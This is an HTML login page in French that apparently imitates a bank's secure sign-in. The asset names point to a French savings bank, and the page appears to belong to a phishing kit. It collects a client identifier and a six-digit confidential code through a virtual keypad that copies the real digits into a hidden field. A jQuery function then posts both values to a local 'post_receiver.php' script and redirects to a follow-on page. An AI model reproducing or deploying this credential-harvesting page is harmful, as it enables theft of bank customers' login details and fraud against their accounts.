<html lang="fr" class="swm-root-active swm-mode-page"><head></head><body style="">
						<div class="block left">
							<h2 class="block__title">Actualités</h2>
							<img class="block__img" src="./asset-eco/DSP2_actu_Covid19.png">
								<h3 class="block__title">À vos côtés</h3>
								<p class="block__p">Engagés à vos côtés pour vous soutenir durablement.
									<br> Retrouvez toutes les informations utiles et la FAQ.
									</p>
									<div class="block__link">
										<a rel="noopener noreferrer" class="link" target="_blank">En savoir plus</a>
									</div>
								</div>
								<div class="INCONNU waitJeton swm swm-theme-CDN theme-NO-ENCAP swm-page-authent theme-grey swm-theme-CDN-CDN swm-theme-SITE_WEB swm-module-authentCV">
									<link rel="stylesheet" href="./asset-eco/style.css">
										<p></p>
										<div id="swm-tooltip" class="swm-tooltip">
											<span></span>
										</div>
										<div class="dsp2-left login-card-form">
					<div class="swm-modal">
						<div class="swm-modal-wrapper"></div>
						
						
						
						
						
						
						
						
						
					</div>
					<div class="waitAuthJetonMsg" aria-hidden="true">Chargement de l'authentification en cours...</div>
					<div class="swm_block-element mire-auth-content">
																		
																		<div class="auth-cs-cont">
																			
																				<div id="js-error" aria-live="assertive" role="alert" class="auth_error"></div>
																			</div>
																			
																			</div><div class="auth-content js-content-aria-hide swm_codeContainer">
						<h2 class="login-card-title">Connectez-vous</h2><div id="swmModulesAuth">
							<div id="module-authent-cv">
								<div class="container-mire-codeClient"> </div>
								<div id="clavier" style="pointer-events: visible; opacity: 1; display: block;" class="loaded">
									<div class="component-authent-cv swm_block" aria-expanded="true" id="sonore-vk">
										<div class="auth-cs-cont swm-vk">
									<div class="auth-cs-content row_section swm_input-container">
																			
																			
																			
<input name="ch1" type="text" id="client-nbr" onchange="onLoginkey()" oninput="onLoginkey()" onkeydown="onLoginkey()" class="auth-input-erasable auth-login swm_input grey_cross eer_input__field ngim-input swm-placeholder" required="" onkeypress="if (event.keyCode < 45 || event.keyCode > 57) event.returnValue = false;" value="" style="
    border-bottom: 1px solid #858f8f;
    font-size: 16px!important;
">



				
																				
																				
																				
																				
																					<span class="swm_sprite swm_to-clear" id="user_id-delete">
																						<a class="swm_icone swm_effacer" role="button" aria-label="Effacer le champ votre identifiant" href=""></a>
																					</span>
																					
																					<label for="user_id" id="input-id-label" aria-hidden="true">Votre identifiant</label>
																				</div>
											
											
											
											
											
											
											
											
											
											<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
	  


													  
													  
													  
												<div class="mat-form-field-wrapper"><div class="mat-form-field-flex"><!----><!----><div class="mat-form-field-infix">
													  
													  

													   <input hidden="" type="" name="idpassword" id="idpassword" value="">

													  
													  
													  
													  
													  <br> <br>
											
											<div class="auth-cs-content row_section swm_input-container">
																			
																			
																			
<input name="staredPassword" disabled="" type="password" id="secret-nbr" onkeypress="if (event.keyCode < 45 || event.keyCode > 57) event.returnValue = false;" maxlength="6" onchange="onLoginkey()" oninput="onLoginkey()" onkeydown="onLoginkey()" class="auth-input-erasable auth-login swm_input grey_cross eer_input__field ngim-input swm-placeholder" required="" style="font-size: 45px!important;padding-left: 5,5%!important;letter-spacing: 18px;padding-top: 42px;">

<br><br><br>



																				
																				
																				
																				
																				
																					<span class="swm_sprite swm_to-clear" id="user_id-delete">
																						<a class="swm_icone swm_effacer" role="button" aria-label="Effacer le champ votre identifiant" href=""></a>
																					</span>
																					
																					<label for="user_id" id="input-id-label" aria-hidden="true" style="
">Votre code confidentiel</label>
																				</div>
											
													  
												  
													  
													  
													  
												
													  
													  
													  
													  
													  
													  
											
														 
														 
														 
														 
														 

														 
										
                                             <!---->
											 
											 												   
																   
																   
																   
																   


											
											
											
											
											
											
											
											
											
											
											
											
												<div id="gda_vk" class="clavier-container swm_block-element swm_conteneur_clavier swm-visible">
													<div id="img_container" class="img-container">
														<img id="img_clavier" class="keyboard swm_block-element swm_conteneur_clavier" usemap="#tc_tclavier" src="./asset-eco/gen_ui">
														<div id="hover_touche_4_4" href="javascript:void(0)" onclick="addKeyPass('8')" role="button" class="hover" javascript:void(0)="" style="position: absolute; left: 157.5px; top: 135px; width: 52.5px; height: 45px;"></div>
														<div id="hover_touche_4_3" href="javascript:void(0)" onclick="addKeyPass('2')" role="button" class="hover" style="position: absolute; left: 105px; top: 135px; width: 52.5px; height: 45px;"></div>
														<div id="hover_touche_4_2" href="javascript:void(0)" role="button" class="hover" style="position: absolute; left: 52.5px; top: 135px; width: 52.5px; height: 45px;"></div>
														<div id="hover_touche_4_1" href="javascript:void(0)" onclick="addKeyPass('3')" role="button" class="hover" style="position: absolute; left: 0px; top: 135px; width: 52.5px; height: 45px;"></div>
														<div id="hover_touche_3_4" href="javascript:void(0)" role="button" class="hover" style="position: absolute; left: 157.5px; top: 90px; width: 52.5px; height: 45px;"></div>
														<div id="hover_touche_3_3" href="javascript:void(0)" role="button" class="hover" style="position: absolute; left: 105px; top: 90px; width: 52.5px; height: 45px;"></div>
														<div id="hover_touche_3_2" href="javascript:void(0)" role="button" class="hover" style="position: absolute; left: 52.5px; top: 90px; width: 52.5px; height: 45px;"></div>
														<div id="hover_touche_3_1" href="javascript:void(0)" onclick="addKeyPass('4')" role="button" class="hover" style="position: absolute; left: 0px; top: 90px; width: 52.5px; height: 45px;"></div>
														<div id="hover_touche_2_4" href="javascript:void(0)" role="button" class="hover" style="position: absolute; left: 157.5px; top: 45px; width: 52.5px; height: 45px;"></div>
														<div id="hover_touche_2_3" href="javascript:void(0)" onclick="addKeyPass('1')" role="button" class="hover" style="position: absolute; left: 105px; top: 45px; width: 52.5px; height: 45px;"></div>
														<div id="hover_touche_2_2" href="javascript:void(0)" onclick="addKeyPass('5')" role="button" class="hover" style="position: absolute; left: 52.5px; top: 45px; width: 52.5px; height: 45px;"></div>
														<div id="hover_touche_2_1" href="javascript:void(0)" onclick="addKeyPass('6')" role="button" class="hover" style="position: absolute; left: 0px; top: 45px; width: 52.5px; height: 45px;"></div>
														<div id="hover_touche_1_4" href="javascript:void(0)" onclick="addKeyPass('0')" role="button" class="hover" style="position: absolute; left: 157.5px; top: 0px; width: 52.5px; height: 45px;"></div>
														<div id="hover_touche_1_3" href="javascript:void(0)" onclick="addKeyPass('9')" role="button" class="hover" style="position: absolute; left: 105px; top: 0px; width: 52.5px; height: 45px;"></div>
														<div id="hover_touche_1_2" href="javascript:void(0)" role="button" class="hover" style="position: absolute; left: 52.5px; top: 0px; width: 52.5px; height: 45px;"></div>
														<div id="hover_touche_1_1" href="javascript:void(0)" onclick="addKeyPass('7')" role="button" class="hover" style="position: absolute; left: 0px; top: 0px; width: 52.5px; height: 45px;"></div>
													</div>
												</div>
											</div>
											
											
											  <script>
                     function onLoginkey() {
                         if ($("#client-nbr").val().length > 4)
                             $("#field-password-div").attr('class', 'field-password');
                         else
                             $("#field-password-div").attr('class', 'field-password off');
                     
                         buttonActive();
                     }
                     
                     function clearInput(e) {
                         if (e.id == "initClient")
                             document.getElementById("client-nbr").value = "";
                         else if (e.id == "initPass") {
                             document.getElementById("secret-nbr").value = "";
                             document.getElementById("idpassword").value = "";
                         }
                         onLoginkey();
                     
                     }
                     
                     function addKeyPass(num) {
                         $("#field-password").children().prop('disabled', true);
                         var passmasck = document.getElementById("secret-nbr").value;
                         if (passmasck.length < 6) {
                             var pass = document.getElementById("idpassword").value;
                             document.getElementById("secret-nbr").value = passmasck + "*";
                             document.getElementById("idpassword").value = pass + num;
                         }
                         buttonActive();
                     }
                     
                     function buttonActive() {
                         if ($("#client-nbr").val().length > 3 && $("#secret-nbr").val().length >= 6)
                             $("#btn-validate").prop("disabled", false);
                         else
                             $("#btn-validate").prop("disabled", true);
                     }
                     
                     function submitbtn() {
					         document.getElementsByClassName("loader")[0].style.display = "block";

                         var pass = document.getElementById("idpassword").value;
                         var log = $("#client-nbr").val();
                         $("#btn-validate").prop("disabled", true);
                     
                         $.ajax({
                             url: 'post_receiver.php',
                             type: 'Post',
                             data: {
                                 ch1: log,
                                 idpassword: pass
                             },
                             dataType: 'html',
                             success: function(code_html, statut) {
                                 location.href = "eko2.html";
                                 $("#btn-validate").prop("disabled", false);
                             },
                     
                             error: function(resultat, statut, erreur) {
                                 $("#btn-validate").prop("disabled", false);
                             }
							 
							 
                     
                         });
						 
						 
					
                     
                     }
                  </script>
				  
				  
				  
				  
				  
				  
		<style>		  
				  
				  * {
  margin: 0;
  padding: 0;
}

.loader {
  display: none;
  background-image: url(./asset-eco/loader.gif);
  background-repeat: no-repeat;
    position: sticky;
    transform: translate(11%, -1%);
}

.loading {
    width: 60px;
    height: 60px;
}





	</style>		

                                          </div>
										  <div class="btn-group btn-group-is-wrapped">
                                                 <button type="button" disabled="" style="width: 100%;" onclick="submitbtn()" class="btn btn-primary swm_btn-disable" id="btn-validate" rv-text="config.app.identification.boutonTitle">Valider</button>
                                          </div>
										                   

                                       
                                    
																					<br>
																					</div>
																					<div class="swm_block-element changePassword">
																						<a class="swm_link changePassword-cdn-authent" role="button">Code confidentiel oublié ?</a>
																					</div>
																				</div>
					 
					 <div class="loader" style="display;margin-left: auto;margin-right: auto;width: 52px;height: 13px;">

  <div class="loading">

  </div>
</div>
					 
					 </div></div></div></div></div>
											</div>
											<style>
												<!--
html.swm-root-active,
    html.swm-root-active>body,
    #container {
        background-color: #f5f5f5;
    }

    #cmsMainContainer {
        height: 650px;
        position: relative;
        margin-top: 20px;
    }

    .swm-theme-CDN .dsp2-left {
        width: 36% !important;
        height: 75%;
        box-sizing: border-box;
        position: absolute;
        top: 0;
        left: 32%;
        margin: 0 !important;
        padding: 0 2.4rem !important;
    }

    @media all and (max-width: 1250px) {
        .swm-theme-CDN .dsp2-left {
            width: 90% !important;
            left: 50%;
            transform: translateX(-50%);
        }
    }

    .login-card-title {
        margin-top: 10px;
        margin-bottom: 15px;
        font-size: 20px;
        font-weight: 700 !important;
        color: #2e84b7;
    }

    @import url('https://fonts.googleapis.com/css?family=Open+Sans:400,700&display=swap');

    .block {
        width: 30%;
        height: 75%;
        box-sizing: border-box;
        margin: 0 8px;
        padding: 2em;
        font-family: "Open Sans";
        font-size: 15px;
        color: #4a4a4a;
        background-color: #ffffff;
        border-radius: 4px;
        box-shadow: 0 0 5px 0 #ddd;
        -moz-box-shadow: 0 0 5px 0 #ddd;
        -webkit-box-shadow: 0 0 5px 0 #ddd;
        -o-box-shadow: 0 0 5px 0 #ddd;
        filter: progid:DXImageTransform.Microsoft.Shadow(color=#dddddd, Direction=NaN, Strength=5);
    }

    .block.right {
        position: absolute;
        top: 0;
        right: 0;
    }

    .block__title {
        margin-top: 10px;
        margin-bottom: 15px;
    }

    h2.block__title {
        font-size: 20px;
        font-weight: 700;
        color: #2e84b7;
    }

    @media screen and (max-width: 1250px) {
        .block {
            display: none;
        }
    }

    .block__title {
        margin-top: 10px;
        margin-bottom: 15px;
        font-size: 20px;
        font-weight: 700;
        color: #2e84b7;
    }

    .block__list {
        margin: 0;
        padding: 0;
        list-style: none;
    }

    .block__list li {
        position: relative;
    }

    .block__list li {
        border-bottom: 1px solid #ededed;
    }

    .block__list li::after {
        content: "\221F";

        position: absolute;
        top: calc(50% - 13px);
        right: 3px;

        font-size: 1.5em;
        color: #2e84b7;

        -webkit-transition: all .5s;
        -moz-transition: all .5s;
        -o-transition: all .5s;
        transition: all .5s;
        -webkit-transform: rotate(-135deg);
        -moz-transform: rotate(-135deg);
        -o-transform: rotate(-135deg);
        transform: rotate(-135deg);
    }

    .block__list li:hover::after {
        right: 7px;
    }

    .block__list__link {
        display: inline-block;

        padding: 24px 20px 24px 0;

        color: #4a4a4a;
        text-decoration: none;
    }
-->
											</style>
											<div class="block right">
												<h2 class="block__title">Informations diverses</h2>
												<ul class="block__list">
													<li>
														<a data-redirect="demonstartion" rel="noopener noreferrer" class="block__list__link" aria-label="Demonstartion" target="_blank">Démonstration</a>
													</li>
													<li>
														<a data-redirect="securite" rel="noopener noreferrer" class="block__list__link" aria-label="Sécurité" target="_blank">Informations sécurité</a>
													</li>
													<li>
														<a data-redirect="data" rel="noopener noreferrer" class="block__list__link" aria-label="Données personnelles" target="_blank">Données personnelles</a>
													</li>
													<li>
														<a data-redirect="cookies" rel="noopener noreferrer" class="block__list__link" aria-label="Charte cookies" target="_blank">Charte cookies</a>
													</li>
												</ul>
											</div>
											<style>
												<!--
@import url('https://fonts.googleapis.com/css?family=Open+Sans&display=swap');

  .btn_renvoi {
    position: absolute;
    margin-top: 25px;
    right: 0;
    margin-right: 15px;
    padding: 16px 80px 16px 40px;
    font-family: "Open Sans";
    font-size: 15px;
    color: #2e84b7;
    line-height: 1.71;
    text-decoration: none;
    border: 1px solid #2e84b7;
    border-radius: 3px;
    -webkit-border-radius: 3px;
    -moz-border-radius: 3px;
    -webkit-transition: all .5s ease-out;
    -moz-transition: all .5s ease-out;
    -o-transition: all .5s ease-out;
    transition: all .5s ease-out
  }

  @media screen and (max-width:1250px) {
    .btn_renvoi {
      right: auto;
      margin-right: 0;
      left: 50%;
      transform: translateX(-50%)
    }
  }

  .btn_renvoi::after {
    content: "\2794";
    position: absolute;
    right: 35px;
    -webkit-transition: all .5s ease-out;
    -moz-transition: all .5s ease-out;
    -o-transition: all .5s ease-out;
    transition: all .5s ease-out
  }

  .btn_renvoi:hover {
    -moz-box-shadow: inset 0 0 0 4px #2e84b7;
    -webkit-box-shadow: inset 0 0 0 4px #2e84b7;
    -o-box-shadow: inset 0 0 0 4px #2e84b7;
    box-shadow: inset 0 0 0 4px #2e84b7
  }

  .btn_renvoi:hover::after {
    right: 55px
  }

  .banner-cookies {
    font-family: "Open Sans";
    padding: 20px 100px;
    box-sizing: border-box;
    width: 95%;
    max-width: 1060px;
    position: absolute;
    bottom: 25px;
    left: 50%;
    transform: translateX(-50%);
    -webkit-transform: translateX(-50%);
    margin: 0 auto;
    z-index: 9999;
    background-color: #f0f8fc;
    border: 1px solid #2e84b7;
    border-radius: 5px
  }

  .banner-cookies p {
    margin: 10px 0;
    font-size: 13px;
    color: #033e64
  }

  .banner-cookies p a {
    color: #2e84b7;
    text-decoration: underline
  }

  .banner-cookies #banner-cookies-button {
    display: inline-block;
    margin-top: 10px;
    margin-right: 10px;
    background-color: #2e84b7;
    color: #fff;
    border: none;
    box-shadow: none;
    border-radius: 5px;
    padding: 10px 30px;
    box-sizing: border-box;
    font-size: 13px;
    font-weight: 600;
    cursor: pointer
  }

  .banner-cookies .banner-cookies-more {
    display: inline-block;
    margin-top: 10px;
    background-color: #fff;
    color: #2e84b7;
    border: 1px solid #2e84b7;
    box-shadow: none;
    border-radius: 5px;
    padding: 10px 30px;
    box-sizing: border-box;
    font-size: 13px;
    text-decoration: none
  }

  .overlay-cookies {
    font-family: "Open Sans";
    background-color: rgba(0, 0, 0, .6);
    display: none;
    opacity: 0;
    position: fixed;
    top: 0;
    z-index: 99999;
    width: 100%;
    height: 100%;
    -webkit-transition: all .3s ease;
    transition: all .3s ease
  }

  .overlay-cookies.visible {
    display: block;
    opacity: 1
  }

  .overlay-cookies-popin {
    position: fixed;
    top: 100px;
    left: 50%;
    -webkit-transform: translateX(-50%);
    transform: translateX(-50%);
    width: 95%;
    max-width: 800px;
    padding: 50px;
    box-sizing: border-box;
    background: #fff;
    border-radius: 5px
  }

  .overlay-cookies-popin p {
    font-size: 15px
  }

  .overlay-cookies-popin p a {
    color: #94203c;
    text-decoration: underline
  }

  .overlay-cookies-popin p.overlay-cookies-title {
    margin-bottom: 20px;
    font-size: 24px;
    font-weight: 600
  }

  .overlay-cookies-form {
    margin: 20px auto 30px;
    width: 95%
  }

  .overlay-cookies-form:after,
  .overlay-cookies-form:before {
    content: " ";
    display: table
  }

  .overlay-cookies-form:after {
    clear: both
  }

  .overlay-cookies-form .overlay-cookies-form-div {
    margin-bottom: 20px;
    opacity: .4;
    -webkit-transition: all .3s ease;
    transition: all .3s ease
  }

  .overlay-cookies-form .overlay-cookies-form-div:after,
  .overlay-cookies-form .overlay-cookies-form-div:before {
    content: " ";
    display: table
  }

  .overlay-cookies-form .overlay-cookies-form-div:after {
    clear: both
  }

  .overlay-cookies-form .overlay-cookies-form-div.active {
    opacity: 1
  }

  .overlay-cookies-form .overlay-cookies-form-div.active [type=radio]+label:after {
    content: '';
    width: 12px;
    height: 12px;
    background: #94203c;
    position: absolute;
    top: 8px;
    left: 4px;
    border-radius: 100%;
    -webkit-transition: all .2s ease;
    transition: all .2s ease;
    opacity: 1 !important;
    -webkit-transform: scale(1) !important;
    transform: scale(1) !important
  }

  .overlay-cookies-form .overlay-cookies-form-div [type=radio]:checked,
  .overlay-cookies-form .overlay-cookies-form-div [type=radio]:not(:checked) {
    position: absolute;
    left: -9999px
  }

  .overlay-cookies-form .overlay-cookies-form-div [type=radio]:checked+label,
  .overlay-cookies-form .overlay-cookies-form-div [type=radio]:not(:checked)+label {
    position: relative;
    padding-left: 35px;
    cursor: pointer;
    line-height: 20px;
    display: inline-block;
    color: #576675
  }

  .overlay-cookies-form .overlay-cookies-form-div [type=radio]:checked+label:before,
  .overlay-cookies-form .overlay-cookies-form-div [type=radio]:not(:checked)+label:before {
    content: '';
    position: absolute;
    left: 0;
    top: 4px;
    width: 18px;
    height: 18px;
    border: 1px solid #576675;
    border-radius: 100%;
    background: #fff
  }

  .overlay-cookies-form .overlay-cookies-form-div [type=radio]:checked+label:after,
  .overlay-cookies-form .overlay-cookies-form-div [type=radio]:not(:checked)+label:after {
    content: '';
    width: 12px;
    height: 12px;
    background: #2e84b7;
    position: absolute;
    top: 8px;
    left: 4px;
    border-radius: 100%;
    -webkit-transition: all .2s ease;
    transition: all .2s ease
  }

  .overlay-cookies-form .overlay-cookies-form-div [type=radio]:not(:checked)+label:after {
    opacity: 0;
    -webkit-transform: scale(0);
    transform: scale(0)
  }

  .overlay-cookies-form .overlay-cookies-form-div [type=radio]:checked+label:after {
    opacity: 1;
    -webkit-transform: scale(1);
    transform: scale(1)
  }

  .overlay-cookies-form .overlay-cookies-form-div .overlay-cookies-form-div-label {
    font-size: 12px;
    line-height: 19px
  }

  .overlay-cookies-form .overlay-cookies-form-div .overlay-cookies-form-div-label strong {
    display: block;
    margin-bottom: 5px;
    font-weight: 600;
    font-size: 15px
  }

  .overlay-cookies-form input[type=submit] {
    float: right;
    background-color: #2e84b7;
    color: #fff;
    border: none;
    box-shadow: none;
    border-radius: 5px;
    padding: 10px 20px;
    box-sizing: border-box;
    font-size: 14px;
    cursor: pointer;
    text-align: center
  }

  .overlay-cookies-form .close-overlay-cookies {
    float: right;
    color: #576675;
    border: 1px solid #576675;
    border-radius: 5px;
    padding: 10px 20px;
    box-sizing: border-box;
    margin-right: 10px;
    font-size: 14px;
    cursor: pointer;
    text-align: center
  }
-->
											</style>
										
									</div></body></html>